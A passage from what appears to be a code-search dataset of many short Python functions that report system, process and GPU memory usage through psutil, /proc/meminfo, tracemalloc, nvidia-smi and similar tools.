_mem_report(tensors: Iterable, mem_type: str) -> None:\n \"\"\"Print the selected tensors of type\n\n There are two major storage types in our major concern:\n - GPU: tensors transferred to CUDA devices\n - CPU: tensors remaining on the system memory (usually unimportant)\n\n Args:\n - tensors: the tensors of specified type\n - mem_type: 'CPU' or 'GPU' in current implementation \"\"\"\n print(f\"Storage on {mem_type}\")\n print(\"-\" * LEN)\n total_numel = 0\n total_mem = 0\n visited_data: List[Any] = []\n for tensor in tensors:\n if tensor.is_sparse:\n continue\n # a data_ptr indicates a memory block allocated\n data_ptr = tensor.storage().data_ptr()\n if data_ptr in visited_data:\n continue\n visited_data.append(data_ptr)\n\n numel = tensor.storage().size()\n total_numel += numel\n element_size = tensor.storage().element_size()\n mem = numel * element_size / 1024 / 1024 # 32bit=4Byte, MByte\n total_mem += mem\n element_type = type(tensor).__name__\n size = tuple(tensor.size())\n\n if print_all:\n print(f\"{element_type}\\t\\t{size}\\t\\t{mem}\")\n print(\"-\" * LEN)\n print(f\"Total Tensors: {total_numel} \\tUsed Memory Space: {total_mem}\")\n print(\"-\" * LEN)\n\n LEN = 65\n if print_all:\n print(\"=\" * LEN)\n print(\"Element type\\tSize\\t\\t\\tUsed MEM(MBytes)\")\n tensors = []\n for obj in gc.get_objects():\n try:\n if t.is_tensor(obj) or (hasattr(obj, \"data\") and t.is_tensor(obj.data)):\n tensors.append(obj)\n except Exception:\n pass\n cuda_tensors = [tensor for tensor in tensors if tensor.is_cuda]\n host_tensors = [tensor for tensor in tensors if not tensor.is_cuda]\n _mem_report(cuda_tensors, \"GPU\")\n _mem_report(host_tensors, \"CPU\")\n if print_all:\n print(\"=\" * LEN)", "def print_current_mem_usage():\n mem = get_current_mem_usage()\n output = \"# Mem usage = {} MiB #\".format(mem)\n print(\"\\n\" + \"-\" * len(output))\n print(output)\n print(\"-\" * len(output) + \"\\n\")", "def test00(self):\n\n # Obtain memory info (only for Linux 2.6.x)\n for line in Path(\"/proc/self/status\").read_text().splitlines():\n if line.startswith(\"VmSize:\"):\n vmsize = int(line.split()[1])\n elif line.startswith(\"VmRSS:\"):\n vmrss = int(line.split()[1])\n elif line.startswith(\"VmData:\"):\n vmdata = int(line.split()[1])\n elif line.startswith(\"VmStk:\"):\n vmstk = int(line.split()[1])\n elif line.startswith(\"VmExe:\"):\n vmexe = int(line.split()[1])\n elif line.startswith(\"VmLib:\"):\n vmlib = int(line.split()[1])\n print(\"\\nWallClock time:\", clock() - self.tref)\n print(\"Memory usage: ******* %s *******\" % self._getName())\n print(f\"VmSize: {vmsize:>7} kB\\tVmRSS: {vmrss:>7} kB\")\n print(f\"VmData: {vmdata:>7} kB\\tVmStk: {vmstk:>7} kB\")\n print(f\"VmExe: {vmexe:>7} kB\\tVmLib: {vmlib:>7} kB\")", "def memory():\n sin = psutil.virtual_memory()\n return round((sin.total / sin.used) / 100, 3)", "def logMemoryStats():\n class MemoryStatusEx(ctypes.Structure):\n \"\"\" MEMORYSTATUSEX \"\"\"\n kaFields = [\n ( 'dwLength', ctypes.c_ulong ),\n ( 'dwMemoryLoad', ctypes.c_ulong ),\n ( 'ullTotalPhys', ctypes.c_ulonglong ),\n ( 'ullAvailPhys', ctypes.c_ulonglong ),\n ( 'ullTotalPageFile', ctypes.c_ulonglong ),\n ( 'ullAvailPageFile', ctypes.c_ulonglong ),\n ( 'ullTotalVirtual', ctypes.c_ulonglong ),\n ( 'ullAvailVirtual', ctypes.c_ulonglong ),\n ( 'ullAvailExtendedVirtual', ctypes.c_ulonglong ),\n ];\n _fields_ = kaFields; # pylint: disable=invalid-name\n\n def __init__(self):\n super(MemoryStatusEx, self).__init__();\n self.dwLength = ctypes.sizeof(self);\n\n try:\n oStats = MemoryStatusEx();\n ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(oStats));\n except:\n reporter.logXcpt();\n return False;\n\n reporter.log('Memory statistics:');\n for sField, _ in MemoryStatusEx.kaFields:\n reporter.log(' %32s: %s' % (sField, getattr(oStats, sField)));\n return True;", "def debug(self):\n print(self.memory)\n print('r0 = %s, ip = %s' % (self.r0, self.ip))", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def getMemory():\n return tracemalloc.take_snapshot()", "def print_unallocated(self, ):\n pass", "def memory(self):\n # Run 'free -m' command and make a list from output.\n mem_data = self.execCMD('free', '-m').split()\n total_mem = int(mem_data[7]) / 1024.\n used_mem = int(mem_data[15]) / 1024.\n # Caculate percentage\n used_mem_percent = int(used_mem / (total_mem / 100))\n\n # Results are in kilobyte.\n return total_mem, used_mem, used_mem_percent", "def ram(log=False):\n gc.collect()\n freeRam = gc.mem_free()\n allocatedRam = gc.mem_alloc()\n totalRam = freeRam+allocatedRam\n percentage = '{0:.2f} %'.format(freeRam/totalRam*100)\n if (log):\n print('■ Micropython RAM')\n print(' Total : {0:.2f} KB'.format(totalRam/1024))\n print(' Free : {0:.2f} KB'.format(freeRam/1024))\n print(' Free % : {0}'.format(percentage))\n print()\n return freeRam", "def print_memories(memories):\n print(\"Using layout:\", file=sys.stderr)\n for _, memory in memories.items():\n end = memory[\"base\"] + memory[\"length\"] - 1\n print(\"\\t%4s: 0x%08x-0x%08x (%s)\" %\n (memory[\"name\"], memory[\"base\"], end, memory[\"path\"]), file=sys.stderr)", "def info(dump_alloc_table: bytes, /) -> None:", "def print_output():\n print(\"count: [primary: \"+str(primary_shards)+\", replica: \"+str(secondary_shards)+\"]\")\n print(\"size: [primary: \"+pretty_print_storage(total_size_primary)+\", replica: \"+pretty_print_storage(total_size_secondary)+\"]\")\n print(\"disk-max-node: \"+max_size_node_name)\n print(\"watermark-breached: \"+str(watermark_breached))", "def _api_memory_info() -> Dict[str, Any]:\n process = psutil.Process(os.getpid())\n return {k: size(v) for k, v in process.memory_info()._asdict().items()}", "def get_memory() -> dict:\n import os\n\n import psutil\n\n proc = psutil.Process(os.getpid())\n return proc.memory_info()", "def print_mem_usage(usage):\n for region in usage.keys():\n used = usage[region][\"used\"]\n free = usage[region][\"free\"]\n usage_msg = \"{region}:\\n used: {used} bytes\\n free: {free} bytes\"\n usage_msg = usage_msg.format(region=region, used=used, free=free)\n print(usage_msg)", "def get_memory(isamAppliance, statistics_duration, check_mode=False, force=False):\n return isamAppliance.invoke_get(\n \"Retrieving the Memory Usage Statistics\",\n \"/statistics/systems/memory.json{0}\".format(\n tools.create_query_string(\n timespan=statistics_duration)),requires_model=requires_model)", "def get_mem_info():\n import psutil\n vm = psutil.virtual_memory()\n return {\n \"memtotal\": vm.total,\n \"memavailable\": vm.available,\n }", "def dumpMemory():\n libxml2mod.xmlDumpMemory()", "def printHeap(self):\n print self.storeHeap.movies", "def getMemDetail(self):\n mem = {}\n if self.type in ['E', 'T', 'S', 'K', 'A', 'AX', 'W']:\n m = \"The percentage of CP memory utilization:\\s*([\\d\\.]+)%\\s+DP memory utilization:\\s*([\\d\\.]+)%\"\n rt = re.search(m, self.dut.cli(\"show memory detail\"))\n if rt:\n mem = {\"cp\": float(rt.groups()[0]), \"dp\": float(rt.groups()[1])}\n return mem", "def get_memory_info(dut):\n command = \"top -n 1 b | grep 'KiB Mem' \"\n output = st.show(dut, command)\n include_keys = ['total', 'used', 'free', 'buff_cache']\n rv = {each_key: ast.literal_eval(output[0][each_key]) for each_key in output[0] if each_key in include_keys}\n return rv", "def print_numa_stats(numafiles):\n for numafile in numafiles:\n numafile.seek(0)\n node_id = int(numafile.name[numafile.name.find(\"/node/node\")+10:-9])\n ts = int(time.time())\n stats = dict(line.split() for line in numafile.read().splitlines())\n for stat, tag in (# hit: process wanted memory from this node and got it\n (\"numa_hit\", \"hit\"),\n # miss: process wanted another node and got it from\n # this one instead.\n (\"numa_miss\", \"miss\")):\n print (\"sys.numa.zoneallocs %d %s node=%d type=%s\"\n % (ts, stats[stat], node_id, tag))\n # Count this one as a separate metric because we can't sum up hit +\n # miss + foreign, this would result in double-counting of all misses.\n # See `zone_statistics' in the code of the kernel.\n # foreign: process wanted memory from this node but got it from\n # another node. So maybe this node is out of free pages.\n print (\"sys.numa.foreign_allocs %d %s node=%d\"\n % (ts, stats[\"numa_foreign\"], node_id))\n # When is memory allocated to a node that's local or remote to where\n # the process is running.\n for stat, tag in ((\"local_node\", \"local\"),\n (\"other_node\", \"remote\")):\n print (\"sys.numa.allocation %d %s node=%d type=%s\"\n % (ts, stats[stat], node_id, tag))\n # Pages successfully allocated with the interleave policy.\n print (\"sys.numa.interleave %d %s node=%d type=hit\"\n % (ts, stats[\"interleave_hit\"], node_id))", "def sys_service_memory():\n sort_cmd = [\"sort\", \"-k\", \"2nr\"]\n\n p_table = prettytable.PrettyTable(\n ['Service',\n 'Resident Set Size (MiB)',\n ], caching=False)\n p_table.align = 'l'\n p_table.align['Resident Set Size (MiB)'] = 'r'\n\n try:\n output = pipe_command(GREP_CMD, AWK_CMD, sort_cmd,\n cwd=MEMPATH + \"system.slice\")\n LOG.debug(\n 'command: %s\\n%s',\n ' '.join(GREP_CMD + [MEMPATH] + AWK_CMD + sort_cmd), output)\n except subprocess.CalledProcessError as error:\n LOG.error('Could not get total_rss memory, error=%s', error)\n return 1\n\n for line in output.split(\"\\n\"):\n service = line.split(\"memory.stat:total_rss \")[0]\n rss_mem = line.split(\"memory.stat:total_rss \")[-1]\n p_table.add_row(\n [service,\n mem_to_mebibytes(rss_mem),\n ])\n\n # Delete first row wich display total system.slice rss\n p_table.del_row(0)\n return p_table", "def get_ram_info():\n ram_cent = psutil.virtual_memory()[2]\n return str(ram_cent)", "def print_data(self):\n\n\t\t# Open the output file\n\t\tfdo = open(self.out_file, 'w')\n\n\t\tfor area in self.mem_areas.keys():\n\t\t\tfdo.write('\\nArea Range : 0x%.9x - 0x%.9x\\n\\n' % (area, self.mem_areas[area][0]))\n\t\t\tfor key in self.data_hash.keys():\n\t\t\t\tif key > area and key < self.mem_areas[area][0]:\n\t\t\t\t\t# Find out if the page lies in the memory area\n\t\t\t\t\tfdo.write('0x%.8x : %d\\n' % (key, self.data_hash[key]))\n\n\t\tfdo.close()\n\n\t\treturn", "def memory():\n\n mem_info = {}\n\n if platform.linux_distribution()[0]:\n with open('/proc/meminfo') as file:\n c = 0\n for line in file:\n lst = line.split()\n if str(lst[0]) == 'MemTotal:':\n mem_info['total'] = int(lst[1])\n elif str(lst[0]) in ('MemFree:', 'Buffers:', 'Cached:'):\n c += int(lst[1])\n mem_info['free'] = c\n mem_info['used'] = (mem_info['total']) - c\n elif platform.mac_ver()[0]:\n ps = subprocess.Popen(['ps', '-caxm', '-orss,comm'], stdout=subprocess.PIPE).communicate()[0]\n vm = subprocess.Popen(['vm_stat'], stdout=subprocess.PIPE).communicate()[0]\n\n # Iterate processes\n process_lines = ps.split('\\n')\n sep = re.compile('[\\s]+')\n rss_total = 0 # kB\n for row in range(1, len(process_lines)):\n row_text = process_lines[row].strip()\n row_elements = sep.split(row_text)\n try:\n rss = float(row_elements[0]) * 1024\n except:\n rss = 0 # ignore...\n rss_total += rss\n\n # Process vm_stat\n vm_lines = vm.split('\\n')\n sep = re.compile(':[\\s]+')\n vm_stats = {}\n for row in range(1, len(vm_lines) - 2):\n row_text = vm_lines[row].strip()\n row_elements = sep.split(row_text)\n vm_stats[(row_elements[0])] = int(row_elements[1].strip('\\.')) * 4096\n\n mem_info['total'] = rss_total\n mem_info['used'] = vm_stats[\"Pages active\"]\n mem_info['free'] = vm_stats[\"Pages free\"]\n else:\n raise('Unsupported Operating System.\\n')\n exit(1)\n\n return mem_info", "def get_memory():\n with open('/proc/meminfo', 'r') as mem:\n free_memory = 0\n for i in mem:\n sline = i.split()\n if str(sline[0]) in ('MemFree:', 'Buffers:', 'Cached:'):\n free_memory += int(sline[1])\n print(\"____________________ \" + str(free_memory) + \"____________________\")\n return free_memory", "def print_performance_info(self):\n pass", "def deviceMemory(self):\n return 1", "def get_mem():\n return {\n 'MEM': string_chopped_to_float(psutil.virtual_memory(), 'percent=', ', used'),\n }", "def get_memory(self):\n return self.loss_memory", "def check_mem(self, values):\n try:\n virt_mem = psutil.virtual_memory()\n values[keys.KEY_VIRTUAL_MEM_TOTAL] = virt_mem.total\n values[keys.KEY_VIRTUAL_MEM_PERCENT] = virt_mem.percent\n except:\n logging.error(\"Error collecting memory stats.\")", "def memory(self):\r\n return self._memory", "def get_total_memory_size(self):\n memory = 0\n for i in range(4):\n for j in range(4):\n memory += self.system.operator[i, j].memory\n return memory", "def freemem(extra_alloc=0):\r\n gc.collect()\r\n gc.collect()\r\n gc.collect()\r\n n_mallocs = cuda.cuda_ndarray.cuda_ndarray.outstanding_mallocs()\r\n\r\n if hasattr(cuda.cuda_ndarray.cuda_ndarray, \"theano_allocated\"):\r\n theano_alloc = cuda.cuda_ndarray.cuda_ndarray.theano_allocated()\r\n return (\"(n malloc/theano mem allocated in KB)\",\r\n n_mallocs + extra_alloc,\r\n int(theano_alloc / 1024) + extra_size)\r\n\r\n return (\"n malloc on the gpu\", n_mallocs + extra_alloc)\r\n # I don't use the following by default as if there is other stuff running\r\n # on the GPU, this won't work.\r\n mem_info = cuda.cuda_ndarray.cuda_ndarray.mem_info()\r\n gpu_used = (mem_info[1] - mem_info[0]) / 1024 ** 2\r\n mem_info_msg = \"(n malloc/gpu mem used in MB)\"\r\n return (mem_info_msg, n_mallocs, int(gpu_used))", "def getMemory(self):\n return self.memory", "def _debugmallocstats(): # real signature unknown; restored from __doc__\n pass", "def diagnostics(self):\r\n # NB: should be not None for multiprocessing works\r\n return {}", "def stat_cuda(msg: str) -> None:\n print(f'-- {msg:<35} allocated: %dM, max allocated: %dM, cached: %dM, max cached: %dM' % (\n torch.cuda.memory_allocated() / 1024 / 1024,\n torch.cuda.max_memory_allocated() / 1024 / 1024,\n torch.cuda.memory_cached() / 1024 / 1024,\n torch.cuda.max_memory_cached() / 1024 / 1024\n ))", "def memory_usage(self):\n\n def multiply_iter(iterable):\n res = 1\n for x in iterable:\n res *= x\n return res\n\n def add_params(parameter):\n res = 0\n for x in parameter:\n res += multiply_iter(x.shape)\n return res\n\n feat = add_params(self.features.parameters())\n clsf = add_params(self.classifier.parameters())\n total = feat + clsf\n\n mb_f = 4 / 1024 ** 2\n\n print(\"Conv : {0}\".format(feat))\n print(\"FC : {0}\".format(clsf))\n print(\"-----------------\")\n print(\"Total : {0}\".format(total))\n print(\"Memory : {0:.2f}MB\".format(total * mb_f))\n print(\"\")", "def monitor_memory(df, before=True, description='', round_at=6):\n from psutil import virtual_memory\n step = 'Before' if before else 'After'\n description = '-' if not description else description+' -'\n \n # Convert values to gigs\n convert_to_gig = lambda x: round(x / 1024**3, round_at)\n \n # Get statistics\n df_shape = df.shape\n df_memory = convert_to_gig(df.memory_usage(deep=True).sum())\n df_server_memory_available = convert_to_gig(virtual_memory().available)\n df_server_memory_used = convert_to_gig(virtual_memory().used)\n \n print('{0} {1} dataframe shape: {2}'.format(step, description, df_shape))\n print('{0} {1} dataframe memory size: {2} GBytes'.format(step, description, df_memory))\n print('{0} {1} server available memory: {2} GBytes'.format(step, description, df_server_memory_available))\n print('{0} {1} server used memory: {2} GBytes'.format(step, description, df_server_memory_used))", "def get_total_memory_size(self):\n return self.drt_manager.get_total_memory_size()", "def logmem(cls, tag):\n\n cls.logger.info(\"----%s----\", str(tag))\n mem = psutil.virtual_memory()\n cls.logger.info(\"total:%s M\", mem.total / 1024 / 1024)\n cls.logger.info(\"available:%s M\", mem.available / 1024 / 1024)\n cls.logger.info(\"used:%s M\", mem.used / 1024 / 1024)\n cls.logger.info(\"free:%s M\", mem.free / 1024 / 1024)\n cls.logger.info(\"active:%s M\", mem.active / 1024 / 1024)\n cls.logger.info(\"inactive:%s M\", mem.inactive / 1024 / 1024)\n cls.logger.info(\"buffers:%s M\", mem.buffers / 1024 / 1024)\n cls.logger.info(\"cached:%s M\", mem.cached / 1024 / 1024)\n cls.logger.info(\"shared:%s M\", mem.shared / 1024 / 1024)", "def memory():\n\twith open('/proc/meminfo','r') as mem:\n\t\tret = {}\n\t\ttmp = 0\n\t\tfor i in mem:\n\t\t\tsline = i.split()\n\t\t\tif str(sline[0])=='MemTotal:':\n\t\t\t\tret['total'] = int(sline[1]*1.0e-6)\n\treturn ret", "def sane_memory_attributes(memory_info):\n errors = []\n warnings = []\n for grp in memory_info:\n mem_lim_mb = memory_info[grp]['memory.limit_in_bytes'] // 1024**2\n memsw_limit_mb = memory_info[grp]['memory.memsw.limit_in_bytes'] // 1024**2\n if mem_lim_mb != memsw_limit_mb:\n errors.append('{0}/memory.limit and memsw.limit differ'.format(grp))\n if memory_info[grp]['memory.use_hierarchy'] == 0:\n arr = warnings if grp == '.' else errors\n arr.append('{0}/memory.use_hierarchy is 0'.format(grp))\n if filters.is_sp_cgroup(grp) or grp in ('system.slice', 'user.slice',\n 'machine.slice', 'mgmt.slice'):\n if memory_info[grp]['memory.move_charge_at_immigrate'] == 0:\n errors.append('{0}/memory.move_charge_at_immigrate is 0'.format(grp))\n if filters.is_sp_cgroup(grp) and memory_info[grp]['memory.swappiness'] != 0:\n add_to = warnings if grp == 'mgmt.slice' else errors\n add_to.append('{0}/memory.swappiness is not 0'.format(grp))\n return errors, warnings", "def print_max_sizes(self):\n print(\"max_sizes: %s\" % self.max_sizes)", "def get_space_used():\n fs.get_space_used()", "def memory_get_usage():\n raise NotImplementedError()", "def __repr__(self):\n return 'Go By Majority' + (self.memory > 0) * (\"/%i\" % self.memory)", "def debugMemory(activate):\n ret = libxml2mod.xmlDebugMemory(activate)\n return ret", "def get_memory_usage(cls):\n\n mem_stats = psutil.virtual_memory()\n\n mem_stats_dict = { StatsKeys.MEMORY :\n {\n StatsKeys.TOTAL : mem_stats.total,\n StatsKeys.AVAILABLE : mem_stats.available,\n StatsKeys.USED : mem_stats.used\n }\n }\n logger.debug(\"Memory stats: {}\".format(mem_stats_dict))\n\n return mem_stats_dict", "def print_fragmentation():\n\n frag_dict = calculate_fragmentation()\n \n _print_fragmentation(frag_dict, sys.stdout)", "def collect():\n\n command = \"cat /proc/meminfo |grep MemTotal|awk -F' ' '{print $2}'\"\n memTotal_f = round(float(os.popen(command).read())/1024/1000,0)\n memTotal = int(memTotal_f)\n cmd = 'df -h |grep \"/dev/s\"'\n metric_disk = os.popen(cmd).readlines()\n hardNum=[]\n for i in metric_disk:\n hard_space = float((i.strip().split()[1])[:-1])\n hardNum.append(hard_space)\n\n disk_info = sum(hardNum)\n disk_use = {}\n metric_disks=os.popen('df -x tmpfs -x devtmpfs | grep -Eo \" /\\S*$\" ').readlines()\n for disk in metric_disks:\n cmd = 'df|grep -E \"%s$\"' % disk.strip()\n disks = os.popen(cmd).readlines()[0]\n disk_list = disks.split()\n disk_use[disk_list[5]]=disk_list[4]\n hard = {\n \"disk_used\" : disk_use,\n \"disk_total\":disk_info,\n \"mem_total\":memTotal\n }\n\n return hard", "def print_metrics(self):\n # num times regular barcodes appear in a simulated doublet nearest neighbors, grouped by value\n # TODO: this list is 2 dimensional... need to extract dimensione with counts for the counter\n frequencies = [i[1] for i in self.num_times_knn]\n counter = collections.Counter(frequencies)\n print(\"##\\nNumber time barcoded in sim doub KNN: {}\".format(counter))\n\n # artificial fraction\n print(\"##\\nArtificial fraction: {}\".format(self.artificial_fraction))\n\n # num doublets\n print(\"##\\nNumber of doublets called: {}\".format(self.num_doublets))", "def memory(self) -> Optional[Any]:\n return pulumi.get(self, \"memory\")", "def memory(self) -> Optional[Any]:\n return pulumi.get(self, \"memory\")", "def checkMemDetail(self):\n mem = self.getMemDetail()\n err_msg = []\n task_result = device_status = 0\n\n if not mem:\n err_msg.append('Get Memory detail info failed')\n task_result = device_status = 1\n else:\n # 以后可扩展告警条件\n pass\n return mem, err_msg, task_result, device_status", "def memory_snapshot(tag, rank):\n GB = 1024 * 1024 * 1024\n MB = 1024 * 1024\n KB = 1024\n\n peak = dgl.partition.get_peak_mem() * KB\n mem = psutil.virtual_memory()\n avail = mem.available / MB\n used = mem.used / MB\n total = mem.total / MB\n\n mem_string = f\"{total:.0f} (MB) total, {peak:.0f} (MB) peak, {used:.0f} (MB) used, {avail:.0f} (MB) avail\"\n logging.debug(f\"[Rank: {rank} MEMORY_SNAPSHOT] {mem_string} - {tag}\")", "def info(self):\n import string\n results = self.info_list()\n labels = \"%-8s %-9s %-4s %-8s %-8s %-4s\" % \\\n ('MACHINE','CPU','GHZ','MB TOTAL',\n 'MB FREE','LOAD')\n print labels\n for i in range(len(self.workers)):\n name = string.split(self.workers[i].host,'.')[0]\n res = results[i]\n s = \"%-8s %2dx%-6s %4.1f %8.1f %8.1f %4.2f\" % \\\n (name[-8:], res['cpu_count'],res['cpu_type'][-6:], \\\n res['cpu_speed'],res['mem_total'],res['mem_free'],\\\n res['load_1'])\n print s", "def allocatememory(self):\n pass", "def get_memory_info(ssh):\r\n cmd04='wmic memorychip get capacity'\r\n retry_number1=3\r\n try:\r\n while True:\r\n if retry_number1 == 0:\r\n logger.writeLog(\"get memory sum size fail\",level='error')\r\n break\r\n stdin,stdout,stderr=ssh.exec_command(cmd04)\r\n data04=stdout.read().decode().strip('Capacity')\r\n print(data04)\r\n if data04 == \"\":\r\n retry_number1 -= 1\r\n logger.writeLog(\"get memory sum size data null\",level='error')\r\n continue\r\n else:\r\n result_list=data04.split()\r\n print(result_list)\r\n memory_size=float(int(result_list[0])+int(result_list[1]))/1024/1024/1024\r\n print(\"mem total Gb: \",memory_size)\r\n logger.writeLog(\"get memory sum size success\",level='info')\r\n # return memory_size\r\n break\r\n except:\r\n logger.writeLog(\"get memory size error\",level='error')\r\n return None\r\n\r\n#6.内存剩余量/Gb\r\n# def get_memory_surplus(ssh):\r\n \"\"\"get memory surplus\"\"\"\r\n cmd05='wmic OS get FreePhysicalMemory'\r\n retry_number2=3\r\n try:\r\n while True:\r\n if retry_number2 == 0:\r\n logger.writeLog(\"get memory surplus fail\",level='error')\r\n break\r\n stdin,stdout,stderr=ssh.exec_command(cmd05)\r\n data05=int(stdout.read().decode().split()[1])\r\n print(data05)\r\n if data05 == \"\":\r\n logger.writeLog(\"get memory surplus data null\",level='error')\r\n retry_number2 -= 1\r\n continue\r\n else:\r\n memory_surplus=round(float(data05)/1024/1024,4)\r\n print(\"mem free Gb: \",memory_surplus)\r\n logger.writeLog(\"get memory surplus data success\",level='info')\r\n # return memory_surplus\r\n break\r\n except:\r\n logger.writeLog(\"get memory surplus error\",level='error')\r\n return None\r\n\r\n#7.内存使用率\r\n# def get_memory_ratio(ssh):\r\n \"\"\"get memory ratio\"\"\"\r\n # memory_size=get_memory_size(ssh)\r\n # memory_surplus=get_memory_surplus(ssh)\r\n if memory_size == \"\" or memory_surplus == \"\":\r\n logger.writeLog(\"memory_szie is null or memory_surplus is null\",level='error')\r\n return None\r\n else:\r\n try:\r\n data06=round(float((memory_size-memory_surplus))/memory_size,4)\r\n print(\"mem use ratio: \",data06)\r\n logger.writeLog(\"get memory ratio success\",level='info')\r\n return (memory_size,memory_surplus,data06)\r\n except:\r\n logger.writeLog(\"get memory ratio error\",level='error')\r\n return None", "def print_heap(self):\n print self.queue[:self.size:]", "def MemoryInfo(cls):\n\t\tres = {}\n\t\tfor line in cat(\"/proc/meminfo\").split(\"\\n\")[:-1]:\n\t\t\tline = RE_SPACES.sub(\" \", line).strip().split(\" \")\n\t\t\tname, value = line[:2]\n\t\t\tres[name.replace(\"(\", \"_\").replace(\")\", \"_\").replace(\":\", \"\")] = int(value)\n\t\treturn res", "def diagnostics(self, oid):\n path = '/servers/%s/diagnostics' % oid\n res = self.client.call(path, 'GET', data='', token=self.manager.identity.token)\n self.logger.debug('Shows basic usage data for server %s: %s' % \n (oid, truncate(res)))\n return res[0]", "def show(self, threadID):\n print(\"[thread %d] Simulated Clustered Disk Space Allocation\" % threadID)\n line = '=' * 32\n print line\n for i in range(self.size/32):\n print ''.join(self.disk_mem[32*i:32*(i+1)])\n print line", "def report(self):\n np.set_printoptions(formatter={'float': '{:.2e}'.format})\n print('---Differences of breakpoints---')\n all_max = np.max(self.max, axis=0, keepdims=False)\n print('Maximum:\\n', all_max)\n all_mean = np.mean(self.mean, axis=0, keepdims=False)\n print('Mean:\\n', all_mean)", "def virtual_memory():\n mem = cext.virtual_mem()\n totphys, availphys, totsys, availsys = mem\n #\n total = totphys\n avail = availphys\n free = availphys\n used = total - avail\n percent = usage_percent((total - avail), total, round_=1)\n return svmem(total, avail, percent, used, free)", "def check(cls):\n vms = list(cls._vm_agents_for_host())\n\n large_overhead_vms = []\n swapping_vms = []\n total_guest_and_overhead = 0\n expected_guest_and_overhead = 0\n\n # individual VMs ok?\n for vm in vms:\n with vm:\n try:\n vm_mem = vm.qemu.proc().memory_full_info()\n except Exception:\n # It's likely that the process went away while we analyzed\n # it. Ignore.\n continue\n if vm_mem.swap > 1 * GiB:\n swapping_vms.append(vm)\n expected_size = (\n vm.cfg[\"memory\"] * MiB\n + 2 * vm.qemu.vm_expected_overhead * MiB\n )\n expected_guest_and_overhead += (\n vm.cfg[\"memory\"] * MiB + vm.qemu.vm_expected_overhead * MiB\n )\n total_guest_and_overhead += vm_mem.pss\n if vm_mem.pss > expected_size:\n large_overhead_vms.append(vm)\n\n output = []\n result = OK\n if large_overhead_vms:\n result = WARNING\n output.append(\n \"VMs with large overhead: \"\n + \",\".join(x.name for x in large_overhead_vms)\n )\n if swapping_vms:\n result = WARNING\n output.append(\n \"VMs swapping:\" + \",\".join(x.name for x in swapping_vms)\n )\n if total_guest_and_overhead > expected_guest_and_overhead:\n result = CRITICAL\n output.append(\"High total overhead\")\n\n if result is OK:\n output.insert(0, \"OK\")\n elif result is WARNING:\n output.insert(0, \"WARNING\")\n elif result is CRITICAL:\n output.insert(0, \"CRITICAL\")\n else:\n output.insert(0, \"UNKNOWN\")\n\n output.insert(1, \"{} VMs\".format(len(vms)))\n output.insert(\n 2, \"{:,.0f} MiB used\".format(total_guest_and_overhead / MiB)\n )\n output.insert(\n 3, \"{:,.0f} MiB expected\".format(expected_guest_and_overhead / MiB)\n )\n\n print(\" - \".join(output))\n\n return result", "def print_stats():\n if spritegroup_stats[0] > 0:\n generic.print_info(\"Concurrent spritegroups: {}/{} ({})\".format(spritegroup_stats[0], total_action2_ids, str(spritegroup_stats[1])))\n if a2register_stats[0] > 0:\n generic.print_info(\"Concurrent Action2 registers: {}/{} ({})\".format(a2register_stats[0], total_tmp_locations, str(a2register_stats[1])))", "def print(self):\r\n print(\"[DEBUG] STACK: \", self.__memory.__repr__())", "def get_gpu_memory_map():\n result = subprocess.check_output(\n [\n 'nvidia-smi', '--query-gpu=memory.used',\n '--format=csv,nounits,noheader'\n ], encoding='utf-8')\n # Convert lines into a dictionary\n gpu_memory = [int(x) for x in result.strip().split('\\n')]\n gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))\n print(\"Current usage: %i of 11178\" % gpu_memory_map[1])", "def ufree(verbose=False):\n import gc\n import os\n F = gc.mem_free()\n A = gc.mem_alloc()\n T = F+A\n P = '{0:.2f}%'.format(F/T*100)\n if not verbose:\n return P\n return ('Total: {} Free: {} ({})'.format(T ,F, P))", "def _memtop_setup():\n return (\n _memtop_setup_parser,\n _memtop_exec,\n \"Display source lines that allocate the most memory.\"\n )", "def GraphMemVsSize(data, args, cmd):\n p = data[args][cmd]\n vers = sorted(p)\n sizes = sorted(p[vers[0]])\n for ver in vers:\n mems = [p[ver][size][1] for size in sizes]\n plt.plot(sizes, mems, label=ver)\n if cmd == 'delta':\n mult=10240\n else:\n mult=32\n ax = plt.gca()\n ax.yaxis.set_major_locator(MultipleLocator(mult))\n ax.set_xlim(left=0, right=1024)\n #plt.xscale('log')\n #plt.yscale('log')\n saveplt('data/mem-size-%s-%s.svg' % (args,cmd), '%s memory vs filesize for %s' % (cmd, args),\n 'filesize', 'KB', sizeticks)", "def _get_resident_memory_in_bytes():\n\n # Convert Kb to bytes\n k = 2**10\n\n if os.name == 'posix':\n # In Linux and MaxOS\n mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n\n # In Linux, the output of the command is in Kb. Convert to Bytes.\n if sys.platform == 'linux':\n mem *= k\n\n else:\n # In windows\n pid = os.getpid()\n command = ['tasklist', '/fi', '\"pid eq %d\"' % pid]\n\n try:\n pid = os.getpid()\n command = ['tasklist', '/fi', 'pid eq %d' % pid]\n process = subprocess.Popen(command, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n error_code = process.poll()\n if error_code != 0:\n mem = 'n/a'\n return mem\n\n # Parse output\n last_line = stdout.strip().decode().split(\"\\n\")[-1]\n\n # Check last line of output has any number in it\n is_digit = [char.isdigit() for char in last_line]\n if not any(is_digit):\n mem = 'n/a'\n return mem\n\n # Get memory as string and its unit\n mem_string = last_line.split(' ')[-2].replace(',', '')\n mem = int(mem_string)\n mem_unit = last_line.split(' ')[-1]\n\n # Convert bytes based on the unit\n if mem_unit == 'K':\n exponent = 1\n if mem_unit == 'M':\n exponent = 2\n if mem_unit == 'G':\n exponent = 3\n if mem_unit == 'T':\n exponent = 4\n\n # Memory in bytes\n mem = mem * (k**exponent)\n\n except FileNotFoundError:\n mem = 'n/a'\n\n return mem", "def printMachineStatOut():\n print(\"---------------MACHINES STATS --------------------------\\n\", file=out_file)\n for machine in machines_list:\n cur_job_list = machine.retrieveJobsList()\n print(\"machine number \", machine.number, \"assigned jobs [number,length,type]:\", file=out_file)\n l = []\n for job_number, job in cur_job_list.items():\n l.append(job)\n print(\"\".join(str(l)), 